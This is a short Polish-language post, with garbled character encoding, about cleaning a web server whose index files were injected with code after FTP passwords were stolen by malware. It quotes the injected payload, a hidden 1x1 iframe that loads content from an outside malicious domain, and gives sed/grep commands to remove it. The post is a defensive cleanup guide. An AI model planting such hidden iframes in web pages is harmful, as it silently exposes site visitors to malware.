|
Coraz czê¶ciej dochodzi przejêcia hase³ do naszych ftp. Dzieje siê tak na skutek dzia³ania wirusa w komputerze lokalnym - przejmuje on has³a do ftp gdy siê na niego logujemy. Has³a nastêpnie u¿ywane s± do w³amania na nasz serwer ftp i zmian w plikach. Najczêsciej zmiany dokonywane sa automatycznie - np. doklejane s± kawa³ki kodu. Osttanio mia³em podobny problem - doklejony zosta³ kawa³ek kodu do ka¿dego pliku index na serwerze. Doklejony kod wygl±da³ tak:
<iframe src="http://litedownloadseek.cn/in.cgi?cocacola22" width=1 height=1 style="visibility: hidden"><\iframe>
Lub tak: <html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola22" width=1 height=1 style="visibility: hidden"><\iframe></body></html> Pozbycie siê tego bywa uci±¿liwe, bo dla serwisów postawionych na joomli index jest w ka¿dym prawie katalogu, nawet czasem pusty. JEsli mamy dostep do shella sprawê szybko i bezbole¶nie za³±twi komeda: sed -i 's/<html><body><iframe src=\"http:\/\/litedownloadseek.cn\/in.cgi?cocacola22\" width=1 height=1 style=\"visibility: hidden\"><\/iframe><\/body><\/html>//g' `grep "litedownloadseek" * -r -l`
sed -i 's/<iframe src=\"http:\/\/litedownloadseek.cn\/in.cgi?cocacola22\" width=1 height=1 style=\"visibility: hidden\"><\/iframe>//g' `grep "litedownloadseek" * -r -l`
|
Komputery